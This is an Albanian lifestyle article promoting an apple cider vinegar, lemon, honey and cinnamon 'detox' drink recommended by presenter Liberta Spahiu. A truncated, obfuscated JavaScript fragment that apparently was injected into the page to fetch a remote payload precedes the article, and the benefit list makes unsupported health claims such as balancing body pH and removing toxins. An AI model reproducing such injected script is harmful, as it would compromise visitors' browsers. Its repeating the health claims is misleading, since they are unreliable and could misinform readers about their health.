;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Uthulla e mollës, pija çudibërëse që ua rekomandon Liberta

By

Detox – ky proces që kurrë nuk duhet anashkaluar, kur vie puna tek mirëqenia e përgjithshme e shëndetit dhe fizikut tonë.

Në mënyrë tipike nënkupton ndjekjen e një diete specifike ose përdorimin e produkteve të veçanta që heqin qafe toksina nga trupin juaj, duke përmirësuar kështu shëndetin dhe promovuar humbjen e peshës.

Për fat të mirë, trupi juaj është i pajisur mirë për të eliminuar toksinat dhe nuk kërkon dieta speciale ose shtesa të shtrenjta për ta bërë këtë.

Thënë kështu, ju mund të përmirësoni sistemin e detoksifikimit natyral të trupit tuaj.

Zgjedhja e moderatores së njohur Liberta Spahiu, është një nga këshillat më të mira që do merrni sa i përket kujdesit të trupit tuaj – dhe jo nuk ka të bëjë më shpenzime marramendëse sepse sa i përket trajtimit të trupit Liberta zgjedh ato mënyra sa më natyrale.

Liberta i qëndron besnike pijeve detox, sepse për një femër që punon tërë ditën ky ka qenë qelësi të ruajë freskinë dhe energjinë e saj. Ajo thekson se ushtrimet fizike janë shumë të rëndësishme, meqenëse i kushton një kohë të mirë aktivitetit fizik. Mirëpo ajo ka një formulë të thjeshtë të cilës i përmbahet, “kujdesi fillon nga brenda”. Këtu tregon se edhe pse është e kujdesshme në zgjedhjen e ushqimit, është po ashtu e rëndësishme t’i ofrojmë trupit pastrim nga toksina. Pija çudibërëse është pija detox me uthull molle dhe e gjitha kjo mund të sajohet në kushte shtëpiake!

Receta është shumë e thjeshtë:

Një gotë uji të nxehtë hidhni 2 lugë uthull molle (Liberta propozon të përdoret gjithnjë uthull molle organike, nga ato që kanë copëza në përmbajtje), 2 lugë lëng limoni, 1 lugë mjaltë dhe 1 lugë kanellë e bluar. Të gjithë këta përbërës i gjeni në tregjet tona!

Image result for apple cider vinegar detox

Do pyesni pse është kaq e rëndësishme një pije detox që në pamje është kaq e thjeshtë?

Konsumimi i kësaj pije detox qoftë çdo ditë ose si pjesë e një detoxi të dedikuar, sjell përfitimet e mëposhtme:

  • duke ndihmuar në humbjen e peshës,
  • ulje e oreksit,
  • balancimi i pH-it të trupit,
  • rregullimin e niveleve të sheqerit në gjak,
  • ulja e kolesterolit të lartë,
  • përmirësimi i tretjes,
  • forcimi i sistemit imunitar,
  • duke siguruar probiotikë (baktere të mira) në zorrë,
  • duke ndihmuar në largimin e toksinave,
  • kushtet shëruese të lëkurës,
  • sigurimi i enzimave në trup.

Artikuj të ngjashëm